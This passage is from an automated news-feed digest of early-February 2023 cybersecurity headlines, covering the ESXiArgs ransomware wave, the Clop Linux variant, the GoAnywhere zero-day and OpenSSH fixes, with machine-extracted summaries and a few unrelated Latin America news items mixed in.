                Autosummary: In my view, the country is only set to grow in IoT. They are more democratic, count fewer language barriers and have a young, tech-savvy populace – the perfect conditions for economic golden years. At a minimum, devices must count encrypted, direct communications, and cybersecurity leaders should review device origin in any onboarding process. China, on the other hand, is coming out of the pandemic and keen to continue its tech bull run, so we cannot expect them to go down without a fight.


                How to scale cybersecurity for your business

                ciber
                2023-02-07 https://www.helpnetsecurity.com/2023/02/07/how-to-scale-cybersecurity-for-your-business/

                All businesses seek profitable growth. The issue is that growth adds complexity. Organizations need new systems and more employees to support this larger footprint, thus expanding the number of potential points of failure. This means more financial and reputation risks going forward – especially as organizations grow their digital presence. To balance out these unintended consequences of growth, organizations need to have a cybersecurity strategy and the necessary tools to implement it. Many already realize … More

                The post How to scale cybersecurity for your business appeared first on Help Net Security.


                Autosummary: “You also have to ‘prove’ to multiple parties that you have ‘done the right thing’ from their perspective, like PCI, ISO, the legal system, regulators, insurance companies, etc.” Dispense with ad hoc responses to security incidents: many organizations are choosing to scale their cybersecurity in response to trends such as remote work, cloud migration, and/or new data privacy regulations – that is, developments that aren’t going away anytime soon. The benefits of cybersecurity scaling: Sean Atkinson, CISO at CIS, explained that cybersecurity scaling helps organizations prevent profitable growth from spiraling out of control.


                Clop ransomware flaw allowed Linux victims to recover files for months

                exploits ransomware
                2023-02-07 https://www.bleepingcomputer.com/news/security/clop-ransomware-flaw-allowed-linux-victims-to-recover-files-for-months/
                The Clop ransomware gang is now also using a malware variant that explicitly targets Linux servers, but a flaw in the encryption scheme has allowed victims to quietly recover their files for free for months. [...]

                Autosummary: The files and folders it targets include the user's "/home" directory, which contains all personal files, the "/root" directory, "/opt," and Oracle directories ("/u01" - "/u04") used for storing database files or as mount points for Oracle software.


                LockBit ransomware gang claims Royal Mail cyberattack

                exploits ransomware ciber
                2023-02-07 https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-claims-royal-mail-cyberattack/
                The LockBit ransomware operation has claimed the cyberattack on the UK's leading mail delivery service Royal Mail that forced the company to halt its international shipping services due to "severe service disruption." [...]

                Autosummary: Royal Mail entry on LockBit"s data leak site (BleepingComputer) Attack described as a "cyber incident" Royal Mail first detected the attack on January 10 and hired outside forensic experts to help with the investigation. "


                Actively exploited GoAnywhere MFT zero-day gets emergency patch

                exploits
                2023-02-07 https://www.bleepingcomputer.com/news/security/actively-exploited-goanywhere-mft-zero-day-gets-emergency-patch/
                Fortra has released an emergency patch to address an actively exploited zero-day vulnerability in the GoAnywhere MFT secure file transfer tool. [...]

                Autosummary: Dozens of instances exposed online, mitigation also available. In a Saturday update to its advisory, Fortra explained that "the attack vector of this exploit requires access to the administrative console of the application, which in most cases is accessible only from within a private company network, through VPN, or by allow-listed IP addresses (when running in cloud environments, such as Azure or AWS)."


                Anonymous leaked 128GB of data stolen from Russian ISP Convex revealing FSB’s warrantless surveillance

                rusia-ucrania
                2023-02-07 https://securityaffairs.com/141888/hacktivism/anonymous-fsb-surveillance.html

                The popular collective Anonymous has leaked 128 GB of data allegedly stolen from the Russian Internet Service Provider Convex. The collective Anonymous released last week 128 gigabytes of documents that were allegedly stolen from the Russian Internet Service Provider Convex. The huge trove of data was leaked by an affiliate of Anonymous’s affiliate group called […]

                The post Anonymous leaked 128GB of data stolen from Russian ISP Convex revealing FSB’s warrantless surveillance appeared first on Security Affairs.

                Autosummary: #Anonymous #OpRussia https://t.co/Q2DwUb3t3c, hacked they provide telecom services in #Russia, internet/telephone/cable Government, business Green Atom project exposed and used for spying on Internet/telephone traffic under an agreement with the FSS Credit- CAXXII#Ukraine pic.twitter.com/DTxNfa5Mpl — Anonymous Operations (@AnonOpsSE) January 31, 2023 Such surveillance activities are classified as unauthorized wiretapping, espionage, and warrantless surveillance of civilians, which are against the country’s laws.


                Released: Decryptor for Cl0p ransomware’s Linux variant

                exploits ransomware
                2023-02-07 https://www.helpnetsecurity.com/2023/02/07/cl0p-ransomware-decryptor-linux/

                Flawed encryption logic used in Cl0p (Clop) ransomware’s Linux (ELF) variant has allowed SentinelOne researchers to create and release a free decryptor. “The [Cl0p] Windows variant encrypts the generated RC4 key responsible for the file encryption using the asymmetric algorithm RSA and a public key. In the Linux variant, the generated RC4 key is encrypted with a RC4 [hardcoded] ‘master-key’,” the researchers explained. The differences between Windows and Linux variants The Linux Cl0p variant is … More

                The post Released: Decryptor for Cl0p ransomware’s Linux variant appeared first on Help Net Security.

                Autosummary: “While the Linux-flavored variation of Cl0p is, at this time, in its infancy, its development and the almost ubiquitous use of Linux in servers and cloud workloads suggests that defenders should expect to see more Linux-targeted ransomware campaigns going forward.”


                Hackers Exploit Vulnerabilities in Sunlogin to Deploy Sliver C2 Framework

                exploits
                2023-02-07 https://thehackernews.com/2023/02/hackers-exploit-vulnerabilities-in.html
                Threat actors are leveraging known flaws in Sunlogin software to deploy the Sliver command-and-control (C2) framework for carrying out post-exploitation activities. The findings come from AhnLab Security Emergency response Center (ASEC), which found that security vulnerabilities in Sunlogin, a remote desktop program developed in China, are being abused to deploy a wide range of payloads. "Not


                Linux Variant of Clop Ransomware Spotted, But Uses Faulty Encryption Algorithm

                exploits ransomware
                2023-02-07 https://thehackernews.com/2023/02/linux-variant-of-clop-ransomware.html
                The first-ever Linux variant of the Clop ransomware has been detected in the wild, but with a faulty encryption algorithm that has made it possible to reverse engineer the process. "The ELF executable contains a flawed encryption algorithm making it possible to decrypt locked files without paying the ransom," SentinelOne researcher Antonis Terefos said in a report shared with The Hacker News.


                VMware Finds No Evidence of 0-Day in Ongoing ESXiArgs Ransomware Spree

                exploits ransomware
                2023-02-07 https://thehackernews.com/2023/02/vmware-finds-no-evidence-of-0-day-flaw.html
                VMware on Monday said it found no evidence that threat actors are leveraging an unknown security flaw, i.e., a zero-day, in its software as part of an ongoing ransomware attack spree worldwide. "Most reports state that End of General Support (EoGS) and/or significantly out-of-date products are being targeted with known vulnerabilities which were previously addressed and disclosed in VMware


                OpenSSH addressed a new pre-auth double free vulnerability

                exploits
                2023-02-07 https://securityaffairs.com/141907/hacking/openssh-pre-auth-double-free-bug.html

                The maintainers of OpenSSH have addressed multiple security issues, including a memory safety bug in the OpenSSH server (sshd). The maintainers of OpenSSH have addressed a number of security vulnerabilities with the release of version 9.2. One of the issues addressed by the maintainers is a memory safety bug in the OpenSSH server (sshd) tracked as […]

                The post OpenSSH addressed a new pre-auth double free vulnerability appeared first on Security Affairs.


                Russian man pleads guilty to laundering Ryuk ransomware money

                financial exploits ransomware rusia-ucrania
                2023-02-07 https://www.bleepingcomputer.com/news/security/russian-man-pleads-guilty-to-laundering-ryuk-ransomware-money/
                Russian citizen Denis Mihaqlovic Dubnikov pleaded guilty on Tuesday to laundering money for the notorious Ryuk ransomware group for over three years. [...]

                Autosummary: The conspirators, including Dubnikov, used various financial transactions, including international ones, to hide the origin, location, and identity of those who received the ransom payments.


                Medusa botnet returns as a Mirai-based variant with ransomware sting

                exploits ransomware
                2023-02-07 https://www.bleepingcomputer.com/news/security/medusa-botnet-returns-as-a-mirai-based-variant-with-ransomware-sting/
                A new version of the Medusa DDoS (distributed denial of service) botnet, based on Mirai code, has appeared in the wild, featuring a ransomware module and a Telnet brute-forcer. [...]

                Autosummary: Filetypes targeted by Medusa (Cyble). Valid files are encrypted using AES 256-bit encryption, and the .medusastealer extension is appended to the encrypted files' name. The malware's ransomware function (Cyble). However, the encryption method appears broken, turning the ransomware into a data wiper.


                VMware has no evidence of zero-day exploitation in ESXiArgs ransomware attacks

                exploits ransomware
                2023-02-07 https://securityaffairs.com/141920/hacking/vmware-zero-day-esxiargs-ransomware.html

                VMware said there is no evidence that threat actors are exploiting a zero-day flaw in its software as part of an ongoing ESXiArgs ransomware campaign. VMware said that it found no evidence that the threat actors behind the ongoing ESXiArgs ransomware attacks are leveraging a zero-day vulnerability in VMware ESXi servers. “VMware has not found evidence […]

                The post VMware has no evidence of zero-day exploitation in ESXiArgs ransomware attacks appeared first on Security Affairs.



                Turkey earthquake: Mexico sends its famed search and rescue dogs

                latam
                2023-02-07 https://www.bbc.co.uk/news/world-latin-america-64553936?at_medium=RSS&at_campaign=KARANGA
                Quake-prone Mexico has expert teams of humans and canines specialised in searching through rubble.


                New QakNote attacks push QBot malware via Microsoft OneNote files

                exploits
                2023-02-07 https://www.bleepingcomputer.com/news/security/new-qaknote-attacks-push-qbot-malware-via-microsoft-onenote-files/
                A new QBot malware campaign dubbed "QakNote" has been observed in the wild since last week, using malicious Microsoft OneNote ".one" attachments to infect systems with the banking trojan. [...]

                Autosummary: The QakNote campaign: In the new report by Sophos, security researcher Andrew Brandt explains that QBot's operators have started experimenting with this new distribution method since January 31, 2023, using OneNote files that contain an embedded HTML application (HTA file) that retrieves the QBot malware payload.


                World Cup 2030: Argentina, Chile, Paraguay and Uruguay submit joint bid

                latam
                2023-02-07 https://www.bbc.co.uk/sport/football/64562518?at_medium=RSS&at_campaign=KARANGA
                Argentina, Chile, Paraguay and Uruguay officially submit their joint bid to host the 2030 World Cup, 100 years after the inaugural tournament was held in Montevideo.


                Introducing Malwarebytes Mobile Security for Business: How to find malware and stop phishing attacks on smartphones and ChromeOS

                financial exploits
                2023-02-07 https://www.malwarebytes.com/blog/business/2023/02/introducing-malwarebytes-mobile-security-for-business-how-to-find-malware-and-stop-phishing-attacks-on-smartphones-and-chromeos

                Categories: Business

                See how our new offering Malwarebytes Security for Business helps you crush mobile malware and phishing attacks.

                The post Introducing Malwarebytes Mobile Security for Business: How to find malware and stop phishing attacks on smartphones and ChromeOS appeared first on Malwarebytes Labs.

                Autosummary: Mobile Devices and Chromebooks: The Cybersecurity Gap Whether employer-provided or employee- or student-owned, mobile devices and Chromebooks are tempting targets for malicious threat actors—yet, these mobile devices remain woefully under-protected. To that end, there are two ways to activate the endpoint agent for your mobile devices: Email (self-activation by end users) and via Mobile Device Management (MDM).


                Florida hospital takes entire IT systems offline after "ransomware attack"

                exploits
                2023-02-07 https://www.malwarebytes.com/blog/news/2023/02/florida-hospital-takes-entire-it-systems-offline-after-ransomware-attack

                Categories: News

                Categories: Ransomware

                Tags: Tallahassee Memorial

                Tags: TMH

                Tags: Mark O’Bryant

                Tags: Max Henderson

                Tags: Atlantic General Hospital

                Tags: ransomware

                Tags: healthcare ransomware attack

                Tallahassee Memorial in Florida has reportedly been hit by a ransomware attack.

                The post Florida hospital takes entire IT systems offline after "ransomware attack" appeared first on Malwarebytes Labs.

                Autosummary: We will also post updates on https://t.co/UGsradFUmG pic.twitter.com/MhQmM67l6b — Tallahassee Memorial (@TMHFORLIFE) February 3, 2023 Tallahassee Memorial's official Twitter account said in a statement on Friday: "We are reviewing each of our IT systems now, prioritizing them and bringing them back online one-by-one." Malwarebytes Endpoint Detection and Response offers built-in ransomware protection, 72-hour ransomware rollback, and zero-day ransomware protection. Tallahassee Memorial Healthcare (TMH), a major hospital system in northern Florida, has reportedly been experiencing an "IT security issue" since Thursday evening, which impacted some of its IT systems.


                New Linux variant of Clop Ransomware uses a flawed encryption algorithm

                exploits ransomware
                2023-02-07 https://securityaffairs.com/141932/cyber-crime/clop-ransomware-linux-variant.html

                A new Linux variant of the Clop ransomware has been observed in the wild; the good news is that its encryption algorithm is flawed. SentinelLabs researchers have observed the first Linux variant of the Clop ransomware. The researchers noticed that the encryption algorithm implemented in the ELF executable is flawed and can allow victims to […]

                The post New Linux variant of Clop Ransomware uses a flawed encryption algorithm appeared first on Security Affairs.


                While governments pass privacy laws, companies struggle to change

                government
                2023-02-06 https://www.helpnetsecurity.com/2023/02/06/privacy-laws-companies-struggle-to-change/

                Government agencies keep making new privacy rules while end users fall victim to malpractice and scams. Bill Tolson, VP of Compliance and eDiscovery at Archive360, has spent many years consulting with regulators and advising businesses on concrete steps to enhance data privacy. In this Help Net Security interview, he discusses how organizations should ensure privacy is built into the design process, cybersecurity investments for better privacy, and much more. What practical steps should companies follow … More

                The post While governments pass privacy laws, companies struggle to change appeared first on Help Net Security.

                Autosummary: A breach is arguably different: While consumer data is compromised, the organizations take a big hit, too, including individual lawsuits, brand damage, loss in shareholder equity, and a decrease in business. Moreover, organizations are required to capture, index, secure, and dispose of all PII based on differing state, federal, and foreign data privacy laws. In all cases, technologies and processes must be designed to encompass all data, with processes built-in early to simplify capture, scanning, retention, search, and retrieval. In certain situations, it’s also possible to deploy software for particular functions inside an isolated environment, which helps ensure network security, scalability, storage accounts, access controls and more.


                Nevada Ransomware has released upgraded locker

                exploits ransomware
                2023-02-06 https://www.helpnetsecurity.com/2023/02/06/nevada-ransomware-upgraded-locker/

                Resecurity has identified a new version of Nevada Ransomware which recently emerged on the Dark Web right before the start of 2023. The actors behind this new project have an affiliate platform first introduced on the RAMP underground community, which is known for initial access brokers (IABs) and other cybercriminal actors and ransomware groups. Around February 1, 2023 – the group distributed an updated locker written in Rust for their affiliates supporting Windows, Linux and … More

                The post Nevada Ransomware has released upgraded locker appeared first on Help Net Security.

                Autosummary: Around February 1, 2023 – the group distributed an updated locker written in Rust for their affiliates supporting Windows, Linux and ESXi – this programming language has become a trend for ransomware developers these days (Blackcat, RansomExx2, Hive, Luna, Agenda).


                OpenSSH Releases Patch for New Pre-Auth Double Free Vulnerability

                exploits
                2023-02-06 https://thehackernews.com/2023/02/openssh-releases-patch-for-new-pre-auth.html
                The maintainers of OpenSSH have released OpenSSH 9.2 to address a number of security bugs, including a memory safety vulnerability in the OpenSSH server (sshd). Tracked as CVE-2023-25136, the shortcoming has been classified as a pre-authentication double free vulnerability that was introduced in version 9.1. "This is not believed to be exploitable, and it occurs in the unprivileged pre-auth


                FormBook Malware Spreads via Malvertising Using MalVirt Loader to Evade Detection

                exploits
                2023-02-06 https://thehackernews.com/2023/02/formbook-malware-spreads-via.html
                An ongoing malvertising campaign is being used to distribute virtualized .NET loaders that are designed to deploy the FormBook information-stealing malware. "The loaders, dubbed MalVirt, use obfuscated virtualization for anti-analysis and evasion along with the Windows Process Explorer driver for terminating processes," SentinelOne researchers Aleksandar Milenkoski and Tom Hegel said in a

                Autosummary: "VSTO add-ins can be packaged alongside Office documents (Local VSTO), or, alternatively, fetched from a remote location when a VSTO-Bearing Office document is opened (Remote VSTO)," Deep Instinct disclosed last week.


                Italian National Cybersecurity Agency (ACN) warns of massive ransomware campaign targeting VMware ESXi servers

                exploits ransomware ciber
                2023-02-06 https://securityaffairs.com/141865/cyber-crime/acn-ransomware-campaign-targets-vmware-esxi.html

                The Italian National Cybersecurity Agency (ACN) warns of an ongoing massive ransomware campaign targeting VMware ESXi servers. The Italian National Cybersecurity Agency (ACN) warns of an ongoing massive ransomware campaign targeting VMware ESXi servers worldwide, including Italian systems. The attackers are attempting to exploit the CVE-2021-21974 vulnerability. According to the ACN, most of the attacks […]

                The post Italian National Cybersecurity Agency (ACN) warns of massive ransomware campaign targeting VMware ESXi servers appeared first on Security Affairs.

                Autosummary: The vulnerability affects the following systems: ESXi 7.x versions earlier than ESXi70U1c-17325551; ESXi 6.7.x versions earlier than ESXi670-202102401-SG; ESXi 6.5.x versions earlier than ESXi650-202102101-SG. The virtualization giant addressed the CVE-2021-21974 bug in February 2021.


                Thousands of unpatched VMware ESXi servers hit by ransomware via old bug (CVE-2021-21974)

                exploits ransomware
                2023-02-06 https://www.helpnetsecurity.com/2023/02/06/vmware-esxi-ransomware-cve-2021-21974/

                Late last week, unknown attackers launched a widespread ransomware attack hitting VMware ESXi hypervisors via CVE-2021-21974, an easily exploitable vulnerability that allows them to run exploit code remotely, without prior authentication. Patches for CVE-2021-21974, a vulnerability in ESXi’s OpenSLP service, were provided by VMware two years ago, and this attack has revealed just how many servers out there are still unpatched, with the SLP service still running and the OpenSLP port (427) still … More

                The post Thousands of unpatched VMware ESXi servers hit by ransomware via old bug (CVE-2021-21974) appeared first on Help Net Security.

                Autosummary: After some initial speculation about the ransomware the attackers use to encrypt vulnerable servers, it has been confirmed that it’s a new ransomware family that has been dubbed ESXiArgs due to the targeted systems and the extension (.args) added to the encrypted virtual machine files (files with the .vmdk, .vmx, .vmxf, .vmsd, .vmsn, .vswp, .vmss, .nvram, and .vmem extensions).


                GuLoader Malware Using Malicious NSIS Executable to Target E-Commerce Industry

                exploits industry
                2023-02-06 https://thehackernews.com/2023/02/guloader-malware-using-malicious-nsis.html
                E-commerce industries in South Korea and the U.S. are at the receiving end of an ongoing GuLoader malware campaign, cybersecurity firm Trellix disclosed late last month. The malspam activity is notable for transitioning away from malware-laced Microsoft Word documents to NSIS executable files for loading the malware. Other countries targeted as part of the campaign include Germany, Saudi Arabia,


                Microsoft: Iranian Nation-State Group Sanctioned by U.S. Behind Charlie Hebdo Hack

                government
                2023-02-06 https://thehackernews.com/2023/02/microsoft-iranian-nation-state-group.html
                An Iranian nation-state group sanctioned by the U.S. government has been attributed to the hack of the French satirical magazine Charlie Hebdo in early January 2023. Microsoft, which disclosed details of the incident, is tracking the activity cluster under its chemical element-themed moniker NEPTUNIUM, which is an Iran-based company known as Emennet Pasargad. In January 2022, the U.S. Federal


                Royal Ransomware adds support for encrypting Linux, VMware ESXi systems

                exploits ransomware
                2023-02-06 https://securityaffairs.com/141876/cyber-crime/royal-ransomware-vmware-esxi.html

                Royal Ransomware operators added support for encrypting Linux devices and targeting VMware ESXi virtual machines. The Royal Ransomware gang is the latest extortion group to add support for encrypting Linux devices and targeting VMware ESXi virtual machines. Other ransomware operators already support Linux encryption, including AvosLocker, Black Basta, BlackMatter, HelloKitty, Hive, […]

                The post Royal Ransomware adds support for encrypting Linux, VMware ESXi systems appeared first on Security Affairs.


                U2opia licenses ORNL technologies for cybersecurity monitoring in real time

                ciber
                2023-02-06 https://www.helpnetsecurity.com/2023/02/07/u2opia-ornl-technologies/

                U2opia licensed two technologies from the Department of Energy’s Oak Ridge National Laboratory that offer a new method for advanced cybersecurity monitoring in real time. “Identifying and quickly responding to attempted cybersecurity attacks is an urgent need across government and industry,” said Susan Hubbard, deputy for science and technology at ORNL. “ORNL’s leadership in cyber resilience has led to the development of two powerful tools that will enable a more secure cyber environment.” The licensing … More

                The post U2opia licenses ORNL technologies for cybersecurity monitoring in real time appeared first on Help Net Security.

                Autosummary: Over the last 23 years, Smith’s information technology solutions company, GCS, based near New Orleans in Harvey, Louisiana, has successfully executed multiple assignments on behalf of the U.S. Navy, Army and Air Force; the Department of Agriculture; the Department of Homeland Security, or DHS; and NASA.


                Italy, France and Singapore Warn of a Spike in ESXI Ransomware

                exploits ransomware
                2023-02-06 https://securityaffairs.com/141889/cyber-crime/experts-warn-esxi-ransomware-attacks.html

                ESXi ransomware targeted thousands of VMware servers in a global-scale campaign, security experts and international CERTs warn. Thousands of computer servers have been targeted by a global ransomware hacking attack targeting VMware (VMW.N) ESXi servers. ESXi is VMware’s hypervisor, a technology that allows organizations to host several virtualized computers running multiple operating systems on a […]

                The post Italy, France and Singapore Warn of a Spike in ESXI Ransomware appeared first on Security Affairs.



                Exploit released for actively exploited GoAnywhere MFT zero-day

                exploits
                2023-02-06 https://www.bleepingcomputer.com/news/security/exploit-released-for-actively-exploited-goanywhere-mft-zero-day/
                Exploit code has been released for an actively exploited zero-day vulnerability affecting Internet-exposed GoAnywhere MFT administrator consoles. [...]

                Autosummary: Map of vulnerable GoAnywhere MFT servers (Shodan). Mitigation available: The company is yet to publicly acknowledge this remote pre-authentication RCE security flaw exploited in attacks (to read the advisory, you need to create a free account first) and hasn't released security updates to address the vulnerability, thus leaving all exposed installations vulnerable to attacks.


                Two year old vulnerability used in ransomware attack against VMware ESXi

                exploits ransomware
                2023-02-06 https://www.malwarebytes.com/blog/news/2023/02/two-year-old-vulnerability-used-in-ransomware-attack-against-vmware-esxi

                Categories: Exploits and vulnerabilities

                Categories: News

                Categories: Ransomware

                Tags: VMware

                Tags: ESXi

                Tags: Nevada

                Tags: ransomware

                Tags: Linux

                Tags: CVE-2021-21974

                Over the weekend, several CERTs warned about ongoing ransomware attacks against unpatched VMware ESXi virtual machines.

                The post Two year old vulnerability used in ransomware attack against VMware ESXi appeared first on Malwarebytes Labs.

                Autosummary: The fixed versions are: for ESXi 7.0, ESXi70U1c-17325551 or later; for ESXi 6.7, ESXi670-202102401-SG or later; for ESXi 6.5, ESXi650-202102101-SG or later; for Cloud Foundation (ESXi) 4.x, 4.2 or later; for Cloud Foundation (ESXi) 3.x, please refer to VMware KB82705. A recommended workaround if you are not using the OpenSLP service in ESXi is to disable the SLP service on VMware ESXi. The threat actor runs an encryption process which is specifically targeting virtual machine files (“.vmdk”, “.vmx”, “.vmxf”, “.vmsd”, “.vmsn”, “.vswp”, “.vmss”, “.nvram”, “.vmem”).


                "Bike desks" combat obesity in Mexico

                latam
                2023-02-06 https://www.bbc.co.uk/news/world-us-canada-64489464?at_medium=RSS&at_campaign=KARANGA
                A Mexican school has invested in a number of "bike desks" so its students stay active during class.


                Week in review: Rail transport cybersecurity, “verified” OAuth apps used to infiltrate organizations

                ciber
                2023-02-05 https://www.helpnetsecurity.com/2023/02/05/week-in-review-rail-transport-cybersecurity-verified-oauth-apps-used-to-infiltrate-organizations/

                Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Mounting cybersecurity pressure is creating headaches in railway boardrooms In this Help Net Security interview, Dimitri van Zantvliet, Cybersecurity Director/CISO of Dutch Railways and co-chair of the Dutch and European Rail ISAC, talks about cyber attacks on railway systems, building a practical cybersecurity approach, and cyber legislation. Critical OpenEMR vulnerabilities may allow attackers to access patients’ … More

                The post Week in review: Rail transport cybersecurity, “verified” OAuth apps used to infiltrate organizations appeared first on Help Net Security.

                Autosummary: Photos: Cybertech Tel Aviv 2023, part 2 Here are a few photos from the event, featured vendors include: DarkOwl, ThriveDX, Minerva Labs, Astrix Security, Ox Security, Waterfall Security, Cynet, Cyber 2.0, Acronis, CyberArk, Israel Aerospace Industries, SafeBreach, Silverfort, CYREBRO Video walkthrough: Cybertech Tel Aviv 2023 The vendors featured in this video are: BeyondTrust, Chainalysis, Check Point, Cisco, Commvault, Cyber 2.0, CyberArk, Cyberbit, Cynet, CYREBRO, Dart, Delinea, Deloitte, Dig, HCLSoftware, Hudson Rock, IBM, Imperva, Israel Aerospace Industries, KELA, Minerva Labs, Orca Security, Ox Security, Pentera, Resec, Rockwell Automation, SafeBreach, Semperis, Snyk, Sonatype, Synopsys, Tenable, ThetaRay, ThriveDX, Waterfall Security Solutions, Wing Security, and XM Cyber. Photos: Cybertech Tel Aviv 2023 Here are a few photos from the event, featured vendors include: Orca, Wise Elite Cyber Solutions, XM Cyber, Check Point, Semperis, CyCube, Mazebolt, IBM Security, bfore.ai, Delinea, Wing Security.


                Linux version of Royal Ransomware targets VMware ESXi servers

                exploits ransomware
                2023-02-05 https://www.bleepingcomputer.com/news/security/linux-version-of-royal-ransomware-targets-vmware-esxi-servers/
                Royal Ransomware is the latest ransomware operation to add support for encrypting Linux devices to its most recent malware variants, specifically targeting VMware ESXi virtual machines. [...]

                Autosummary: BleepingComputer has been reporting on similar Linux ransomware encryptors released by multiple other gangs, including Black Basta, LockBit, BlackMatter, AvosLocker, REvil, HelloKitty, RansomEXX, and Hive.


                The Week in Ransomware - February 3rd 2023 - Ending with a mess

                exploits ransomware
                2023-02-04 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-february-3rd-2023-ending-with-a-mess/
                While the week started slowly, it turned into a big ransomware mess, with attacks striking a big blow at businesses running VMware ESXi servers. [...]

                Autosummary: Finally, we learned more about ransomware attacks conducted this week and in the past. Contributors and those who provided new ransomware information and stories this week include @PolarToffee, @serghei, @fwosar, @BleepinComputer, @LawrenceAbrams, @Seifreed, @Ionut_Ilascu, @malwrhunterteam, @struppigel, @demonslay335, @billtoulas, @vxunderground, @GeeksCyber, @PRODAFT, @brkalbyrk7, @RESecurity, @MsftSecIntel, @1ZRR4H, @pcrisk, @BrettCallow, @ahnlab, @jgreigj, and @k7computing. February 2nd 2023: The LockBit ransomware gang has claimed responsibility for the cyberattack on ION Group, a UK-based software company whose products are used by financial institutions, banks, and corporations for trading, investment management, and market analytics.


                Chile wildfires: State of emergency declared in two regions

                latam government
                2023-02-04 https://www.bbc.co.uk/news/world-latin-america-64521110?at_medium=RSS&at_campaign=KARANGA
                Several people are killed in Chile as wildfires sweep through 14,000 hectares.


                New Wave of Ransomware Attacks Exploiting VMware Bug to Target ESXi Servers

                exploits ransomware
                2023-02-04 https://thehackernews.com/2023/02/new-wave-of-ransomware-attacks.html
                VMware ESXi hypervisors are the target of a new wave of attacks designed to deploy ransomware on compromised systems. "These attack campaigns appear to exploit CVE-2021-21974, for which a patch has been available since February 23, 2021," the Computer Emergency Response Team (CERT) of France said in an advisory on Friday. VMware, in its own alert released at the time, described the issue as an


                Warning: Hackers Actively Exploiting Zero-Day in Fortra's GoAnywhere MFT

                exploits
                2023-02-04 https://thehackernews.com/2023/02/warning-hackers-actively-exploiting.html
                A zero-day vulnerability affecting Fortra's GoAnywhere MFT managed file transfer application is being actively exploited in the wild. Details of the flaw were first publicly shared by security reporter Brian Krebs on Mastodon. No public advisory has been published by Fortra. The vulnerability is a case of remote code injection that requires access to the administrative console of the application.


                Tallahassee Memorial HealthCare, Florida, has taken IT systems offline after cyberattack

                ciber
                2023-02-04 https://securityaffairs.com/141792/hacking/tallahassee-memorial-healthcare-cyberattack.html

                The Tallahassee Memorial HealthCare (TMH) hospital in Florida has taken its IT systems offline and suspended non-emergency procedures after a cyberattack. The attack took place on Thursday and hit some of the hospital's systems. The Tallahassee […]


                PixPirate: New Android Banking Trojan Targeting Brazilian Financial Institutions

                financial exploits latam
                2023-02-04 https://thehackernews.com/2023/02/pixpirate-new-android-banking-trojan.html
                A new Android banking trojan has set its eyes on Brazilian financial institutions to commit fraud by leveraging the PIX payments platform. Italian cybersecurity company Cleafy, which discovered the malware between the end of 2022 and the beginning of 2023, is tracking it under the name PixPirate. "PixPirate belongs to the newest generation of Android banking trojan, as it can perform ATS

                Autosummary: The web inject modules, mainly used for harvesting credentials and sensitive data, are designed to single out banking, mobile payment services, cryptocurrency exchanges, and mobile e-commerce applications spanning Asia, Europe, Middle East, and the Americas.


                CERT-FR warns of a new wave of ransomware attacks targeting VMware ESXi servers

                exploits ransomware
                2023-02-04 https://securityaffairs.com/141804/cyber-crime/vmware-esxi-ransomware.html

                The French Computer Emergency Response Team (CERT-FR) warns that threat actors are targeting VMware ESXi servers in a new wave of ransomware attacks. CERT-FR reported that the threat actors behind these attacks are actively exploiting the vulnerability CVE-2021-21974. "OpenSLP as used […]


                Wildfires rage in Chile

                latam
                2023-02-04 https://www.bbc.co.uk/weather/features/64523640?at_medium=RSS&at_campaign=KARANGA
                Dry weather and high temperatures are exacerbating wildfires across central parts of the country. Matt Taylor has the details.


                GoAnywhere MFT zero-day flaw actively exploited

                exploits
                2023-02-04 https://securityaffairs.com/141826/hacking/goanywhere-mft-zero-day.html

                Threat actors are actively exploiting a zero-day vulnerability in Fortra's GoAnywhere MFT managed file transfer application, experts warn. The investigator Brian Krebs first revealed details about the zero-day on Mastodon and pointed out that Fortra has yet […]


                CISA adds Oracle, SugarCRM bugs to its Known Exploited Vulnerabilities Catalog

                exploits
                2023-02-04 https://securityaffairs.com/141838/security/oracle-sugarcrm-known-exploited-vulnerabilities-catalog.html

                The US Cybersecurity and Infrastructure Security Agency (CISA) added actively exploited vulnerabilities in Oracle and SugarCRM products, tracked as CVE-2022-21587 and CVE-2023-22952 respectively, to its Known Exploited Vulnerabilities Catalog. The CVE-2022-21587 flaw (CVSS score 9.8) affects the Oracle E-Business Suite, which is a set […]


                People in Chile loot beer after truck overturns

                latam
                2023-02-04 https://www.bbc.co.uk/news/world-latin-america-64521112?at_medium=RSS&at_campaign=KARANGA
                Locals in Santiago collect beer from the road after the vehicle carrying it was involved in an accident.


                Google ads push ‘virtualized’ malware made for antivirus evasion

                exploits
                2023-02-03 https://www.bleepingcomputer.com/news/security/google-ads-push-virtualized-malware-made-for-antivirus-evasion/
                An ongoing Google ads malvertising campaign is spreading malware installers that leverage KoiVM virtualization technology to evade detection when installing the Formbook data stealer. [...]

                Autosummary: Abusing Google search ads: over the past month, researchers have seen increased abuse of Google search ads to distribute various malware, including RedLine Stealer, Gozi/Ursnif, Vidar, Rhadamanthys stealer, IcedID, Raccoon Stealer, and many more.


                Jair Bolsonaro: Brazil's ex-president attended election plot meeting - senator

                latam
                2023-02-03 https://www.bbc.co.uk/news/world-latin-america-64507333?at_medium=RSS&at_campaign=KARANGA
                A former ally says Brazil's ex-leader sat in silence as an aide offered ways to discredit October's vote.


                Atlassian's Jira Software Found Vulnerable to Critical Authentication Vulnerability

                exploits
                2023-02-03 https://thehackernews.com/2023/02/atlassians-jira-software-found.html
                Atlassian has released fixes to resolve a critical security flaw in Jira Service Management Server and Data Center that could be abused by an attacker to pass off as another user and gain unauthorized access to susceptible instances. The vulnerability is tracked as CVE-2023-22501 (CVSS score: 9.4) and has been described as a case of broken authentication with low attack complexity.


                Russia-linked Gamaredon APT targets Ukrainian authorities with new malware

                exploits
                2023-02-03 https://securityaffairs.com/141752/malware/apt-gamaredon-attacks.html

                Russia-linked threat actor Gamaredon employed new spyware in cyber attacks aimed at public authorities and critical information infrastructure in Ukraine. The State Cyber Protection Centre (SCPC) of Ukraine warns of a new wave of targeted attacks conducted by the Russia-linked APT group Gamaredon (aka Shuckworm, Actinium, Armageddon, Primitive Bear, UAC-0010, and Trident Ursa). The attacks aimed at public authorities and critical information […]


                Cisco fixed command injection bug in IOx Application Hosting Environment

                exploits
                2023-02-03 https://securityaffairs.com/141743/security/cisco-bug-iox-application-hosting-environment.html

                Cisco has released security updates to address a high-severity command injection vulnerability, tracked as CVE-2023-20076, in the Cisco IOx application hosting environment. "A vulnerability in the Cisco IOx application hosting environment could allow an authenticated, remote attacker […]


                Atlassian fixes critical bug giving access to Jira Service Management

                exploits
